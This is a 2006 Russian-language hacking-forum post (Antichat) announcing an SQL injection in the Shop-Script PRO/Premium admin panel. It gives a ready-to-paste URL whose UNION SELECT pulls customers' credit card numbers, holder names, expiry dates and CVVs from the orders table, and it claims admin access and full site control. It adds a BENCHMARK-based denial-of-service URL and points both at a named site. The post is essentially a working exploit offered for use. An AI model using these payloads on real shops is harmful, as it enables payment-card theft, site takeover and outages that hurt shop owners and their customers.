HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

ShopScript доступ в админ панель
  #1  
Старый 05.11.2006, 13:04
»Atom1c«
Banned
Регистрация: 04.11.2006
Сообщений: 370
С нами: 10271966

Репутация: 1186
По умолчанию ShopScript доступ в админ панель

Если в Pro версии движка интернет магазина Shop Script в браузере вбить:
http://адрес/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
То вы сможете попасть в админкуЕсли Safe Mode будет отключён то можете получить полный контроль над сайтом.Этому багу подвержены версии Shop-Script PRO и Shop-Script Premium все версии.
Также возможно проведение DDos атаки путём
http://адрес/admin.php?dpt=conf&sub=setting&settings_groupID=BE NCHMARK(10000000,BENCHMARK(10000000,md5(current_da te)))

Вот пример сайта
http://www.shop-script-demo.com/pro/admin.php?dpt=reports&sub=product_report&categoryI D=-82+union+select+cc_number,cc_oldername,cc_expires, cc_cvv,null,null,null+from+SS_orders/*&sort=customers_rating&sort_dir=ASC
Только тут включён SafeMod

Последний раз редактировалось Osap1ent*; 05.11.2006 в 13:09..
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
доступ через админ панель!! guno PHP 6 11.10.2006 17:45
Если уже имеется доступ в админ панель форума PhpBB, как узнать реал пасс админа? silveran Уязвимости CMS / форумов 3 06.05.2005 18:54
Получил доступ к админ панели на форуме phpBB, пароль админа не известен. Вопрос.. webster Уязвимости CMS / форумов 12 28.04.2005 05:57
Доступ к интернету bjong Болталка 10 23.12.2004 16:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.